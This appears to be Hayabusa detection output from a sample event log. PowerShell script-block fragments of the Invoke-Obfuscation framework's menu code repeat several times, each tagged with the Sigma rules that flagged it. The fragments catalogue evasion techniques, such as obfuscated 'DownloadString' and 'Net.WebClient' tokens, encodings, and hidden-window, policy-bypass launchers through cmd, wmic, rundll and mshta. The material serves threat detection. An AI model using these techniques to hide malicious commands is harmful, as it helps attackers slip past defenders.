Command to CliCommands if specified by user input. If($PSBoundParameters['Command']) { $Script:CliCommands += $Command.Split(',') $CliWasSpecified = $TRUE If($PSBoundParameters['NoExit']) { $NoExitWasSpecified = $TRUE } If($PSBoundParameters['Quiet']) { # Create empty Write-Host and Start-Sleep proxy functions to cause any Write-Host or Start-Sleep invocations to not do anything until non-interactive -Command values are finished being processed. Function Write-Host {} Function Start-Sleep {} $Script:QuietWasSpecified = $TRUE } } ######################################## ## Script-wide variable instantiation ## ######################################## # Script-level array of Show Options menu, set as SCRIPT-level so it can be set from within any of the functions. # Build out menu for Show Options selection from user in Show-OptionsMenu menu. $Script:ScriptPath = '' $Script:ScriptBlock = '' $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:ObfuscatedCommand = '' $Script:ObfuscatedCommandHistory = @() $Script:ObfuscationLength = '' $Script:OptionsMenu = @() $Script:OptionsMenu += , @('ScriptPath ' , $Script:ScriptPath , $TRUE) $Script:OptionsMenu += , @('ScriptBlock' , $Script:ScriptBlock , $TRUE) $Script:OptionsMenu += , @('CommandLineSyntax' , $Script:CliSyntax , $FALSE) $Script:OptionsMenu += , @('ExecutionCommands' , $Script:ExecutionCommands, $FALSE) $Script:OptionsMenu += , @('ObfuscatedCommand' , $Script:ObfuscatedCommand, $FALSE) $Script:OptionsMenu += , @('ObfuscationLength' , $Script:ObfuscatedCommand, $FALSE) # Build out $SetInputOptions from above items set as $TRUE (as settable). $SettableInputOptions = @() ForEach($Option in $Script:OptionsMenu) { If($Option[2]) {$SettableInputOptions += ([String]$Option[0]).ToLower().Trim()} } # Script-level variable for whether LAUNCHER has been applied to current ObfuscatedToken. $Script:LauncherApplied = $FALSE # Ensure Invoke-Obfuscation module was properly imported before continuing. If(!(Get-Module Invoke-Obfuscation | Where-Object {$_.ModuleType -eq 'Manifest'})) { $PathTopsd1 = ""$ScriptDir\Invoke-Obfuscation.psd1"" If($PathTopsd1.Contains(' ')) {$PathTopsd1 = '""' + $PathTopsd1 + '""'} Write-Host ""`n`nERROR: Invoke-Obfuscation module is not loaded. You must run:"" -ForegroundColor Red Write-Host "" Import-Module $PathTopsd1`n`n"" -ForegroundColor Yellow Exit } # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 # Build interactive menus. $LineSpacing = '[*] ' # Main Menu. $MenuLevel = @() $MenuLevel+= , @($LineSpacing, 'TOKEN' , 'Obfuscate PowerShell command ') $MenuLevel+= , @($LineSpacing, 'STRING' , 'Obfuscate entire command as a ') $MenuLevel+= , @($LineSpacing, 'ENCODING' , 'Obfuscate entire command via ') $MenuLevel+= , @($LineSpacing, 'LAUNCHER' , 'Obfuscate command args w/ techniques (run once at end)') # Main\Token Menu. $MenuLevel_Token = @() $MenuLevel_Token += , @($LineSpacing, 'STRING' , 'Obfuscate tokens (suggested to run first)') $MenuLevel_Token += , @($LineSpacing, 'COMMAND' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'ARGUMENT' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'MEMBER' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'VARIABLE' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'TYPE ' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'COMMENT' , 'Remove all tokens') $MenuLevel_Token += , @($LineSpacing, 'WHITESPACE' , 'Insert random (suggested to run last)') $MenuLevel_Token += , @($LineSpacing, 'ALL ' , 'Select choices from above (random order)') $MenuLevel_Token_String = @() $MenuLevel_Token_String += , @($LineSpacing, '1' , ""Concatenate --> e.g. <('co'+'ffe'+'e')>"" , @('Out-ObfuscatedTokenCommand', 'String', 1)) $MenuLevel_Token_String += , @($LineSpacing, '2' , ""Reorder --> e.g. <('{1}{0}'-f'ffee','co')>"" , @('Out-ObfuscatedTokenCommand', 'String', 2)) $MenuLevel_Token_Command = @() $MenuLevel_Token_Command += , @($LineSpacing, '1' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'Command', 1)) $MenuLevel_Token_Command += , @($LineSpacing, '2' , ""Splatting + Concatenate --> e.g. <&('Ne'+'w-Ob'+'ject')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 2)) $MenuLevel_Token_Command += , @($LineSpacing, '3' , ""Splatting + Reorder --> e.g. <&('{1}{0}'-f'bject','New-O')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 3)) $MenuLevel_Token_Argument = @() $MenuLevel_Token_Argument += , @($LineSpacing, '1' , 'Random Case --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 1)) $MenuLevel_Token_Argument += , @($LineSpacing, '2' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 2)) $MenuLevel_Token_Argument += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('Ne'+'t.We'+'bClient')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 3)) $MenuLevel_Token_Argument += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'bClient','Net.We')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 4)) $MenuLevel_Token_Member = @() $MenuLevel_Token_Member += , @($LineSpacing, '1' , 'Random Case --> e.g. '",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,", @('Out-ObfuscatedTokenCommand', 'Member', 1)) $MenuLevel_Token_Member += , @($LineSpacing, '2' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'Member', 2)) $MenuLevel_Token_Member += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('dOwnLo'+'AdsT'+'Ring').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 3)) $MenuLevel_Token_Member += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'dString','Downloa').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 4)) $MenuLevel_Token_Variable = @() $MenuLevel_Token_Variable += , @($LineSpacing, '1' , 'Random Case + {} + Ticks --> e.g. <${c`hEm`eX}>' , @('Out-ObfuscatedTokenCommand', 'Variable', 1)) $MenuLevel_Token_Type = @() $MenuLevel_Token_Type += , @($LineSpacing, '1' , ""Type Cast + Concatenate --> e.g. <[Type]('Con'+'sole')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 1)) $MenuLevel_Token_Type += , @($LineSpacing, '2' , ""Type Cast + Reordered --> e.g. <[Type]('{1}{0}'-f'sole','Con')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 2)) $MenuLevel_Token_Whitespace = @() $MenuLevel_Token_Whitespace += , @($LineSpacing, '1' , ""`tRandom Whitespace --> e.g. <.( 'Ne' +'w-Ob' + 'ject')>"" , @('Out-ObfuscatedTokenCommand', 'RandomWhitespace', 1)) $MenuLevel_Token_Comment = @() $MenuLevel_Token_Comment += , @($LineSpacing, '1' , ""Remove Comments --> e.g. self-explanatory"" , @('Out-ObfuscatedTokenCommand', 'Comment', 1)) $MenuLevel_Token_All = @() $MenuLevel_Token_All += , @($LineSpacing, '1' , ""`tExecute Token obfuscation techniques (random order)"" , @('Out-ObfuscatedTokenCommandAll', '', '')) # Main\String Menu. $MenuLevel_String = @() $MenuLevel_String += , @($LineSpacing, '1' , ' entire command' , @('Out-ObfuscatedStringCommand', '', 1)) $MenuLevel_String += , @($LineSpacing, '2' , ' entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 2)) $MenuLevel_String += , @($LineSpacing, '3' , ' entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 3)) # Main\Encoding Menu. $MenuLevel_Encoding = @() $MenuLevel_Encoding += , @($LineSpacing, '1' , ""`tEncode entire command as "" , @('Out-EncodedAsciiCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '2' , ""`tEncode entire command as "" , @('Out-EncodedHexCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '3' , ""`tEncode entire command as "" , @('Out-EncodedOctalCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '4' , ""`tEncode entire command as "" , @('Out-EncodedBinaryCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '5' , ""`tEncrypt entire command as (AES)"" , @('Out-SecureStringCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '6' , ""`tEncode entire command as "" , @('Out-EncodedBXORCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '7' , ""`tEncode entire command as "" , @('Out-EncodedSpecialCharOnlyCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '8' , ""`tEncode entire command as "" , @('Out-EncodedWhitespaceCommand' , '', '')) # Main\Launcher Menu. $MenuLevel_Launcher = @() $MenuLevel_Launcher += , @($LineSpacing, 'PS' , ""`t"") $MenuLevel_Launcher += , @($LineSpacing, 'CMD' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'WMIC' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'VAR+' , 'Cmd + set && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN+' , 'Cmd + | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP+' , 'Cmd + | Clip && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'VAR++' , 'Cmd + set && Cmd && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN++' , 'Cmd + set && Cmd | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP++' , 'Cmd + | Clip && Cmd && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL++' , 'Cmd + set Var && && PowerShell iex Var') $MenuLevel_Launcher += , @($LineSpacing, 'MSHTA++' , 'Cmd + set Var && && PowerShell iex Var') $MenuLevel_Launcher_PS = @() $MenuLevel_Launcher_PS += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_PS += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_CMD = @() $MenuLevel_Launcher_CMD += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_WMIC = @() $MenuLevel_Launcher_WMIC += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_RUNDLL = @() $MenuLevel_Launcher_RUNDLL += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '4' , '-NoProfile'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,", @('Out-ObfuscatedTokenCommand', 'Member', 1)) $MenuLevel_Token_Member += , @($LineSpacing, '2' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'Member', 2)) $MenuLevel_Token_Member += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('dOwnLo'+'AdsT'+'Ring').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 3)) $MenuLevel_Token_Member += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'dString','Downloa').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 4)) $MenuLevel_Token_Variable = @() $MenuLevel_Token_Variable += , @($LineSpacing, '1' , 'Random Case + {} + Ticks --> e.g. <${c`hEm`eX}>' , @('Out-ObfuscatedTokenCommand', 'Variable', 1)) $MenuLevel_Token_Type = @() $MenuLevel_Token_Type += , @($LineSpacing, '1' , ""Type Cast + Concatenate --> e.g. <[Type]('Con'+'sole')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 1)) $MenuLevel_Token_Type += , @($LineSpacing, '2' , ""Type Cast + Reordered --> e.g. <[Type]('{1}{0}'-f'sole','Con')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 2)) $MenuLevel_Token_Whitespace = @() $MenuLevel_Token_Whitespace += , @($LineSpacing, '1' , ""`tRandom Whitespace --> e.g. <.( 'Ne' +'w-Ob' + 'ject')>"" , @('Out-ObfuscatedTokenCommand', 'RandomWhitespace', 1)) $MenuLevel_Token_Comment = @() $MenuLevel_Token_Comment += , @($LineSpacing, '1' , ""Remove Comments --> e.g. self-explanatory"" , @('Out-ObfuscatedTokenCommand', 'Comment', 1)) $MenuLevel_Token_All = @() $MenuLevel_Token_All += , @($LineSpacing, '1' , ""`tExecute Token obfuscation techniques (random order)"" , @('Out-ObfuscatedTokenCommandAll', '', '')) # Main\String Menu. $MenuLevel_String = @() $MenuLevel_String += , @($LineSpacing, '1' , ' entire command' , @('Out-ObfuscatedStringCommand', '', 1)) $MenuLevel_String += , @($LineSpacing, '2' , ' entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 2)) $MenuLevel_String += , @($LineSpacing, '3' , ' entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 3)) # Main\Encoding Menu. $MenuLevel_Encoding = @() $MenuLevel_Encoding += , @($LineSpacing, '1' , ""`tEncode entire command as "" , @('Out-EncodedAsciiCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '2' , ""`tEncode entire command as "" , @('Out-EncodedHexCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '3' , ""`tEncode entire command as "" , @('Out-EncodedOctalCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '4' , ""`tEncode entire command as "" , @('Out-EncodedBinaryCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '5' , ""`tEncrypt entire command as (AES)"" , @('Out-SecureStringCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '6' , ""`tEncode entire command as "" , @('Out-EncodedBXORCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '7' , ""`tEncode entire command as "" , @('Out-EncodedSpecialCharOnlyCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '8' , ""`tEncode entire command as "" , @('Out-EncodedWhitespaceCommand' , '', '')) # Main\Launcher Menu. $MenuLevel_Launcher = @() $MenuLevel_Launcher += , @($LineSpacing, 'PS' , ""`t"") $MenuLevel_Launcher += , @($LineSpacing, 'CMD' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'WMIC' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'VAR+' , 'Cmd + set && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN+' , 'Cmd + | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP+' , 'Cmd + | Clip && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'VAR++' , 'Cmd + set && Cmd && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN++' , 'Cmd + set && Cmd | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP++' , 'Cmd + | Clip && Cmd && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL++' , 'Cmd + set Var && && PowerShell iex Var') $MenuLevel_Launcher += , @($LineSpacing, 'MSHTA++' , 'Cmd + set Var && && PowerShell iex Var') $MenuLevel_Launcher_PS = @() $MenuLevel_Launcher_PS += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_PS += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_CMD = @() $MenuLevel_Launcher_CMD += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_WMIC = @() $MenuLevel_Launcher_WMIC += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_RUNDLL = @() $MenuLevel_Launcher_RUNDLL += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '4' , '-NoProfile'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,", @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '4')) ${MenuLevel_Launcher_VAR+} = @() ${MenuLevel_Launcher_VAR+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_STDIN+} = @() ${MenuLevel_Launcher_STDIN+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_CLIP+} = @() ${MenuLevel_Launcher_CLIP+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '7')) 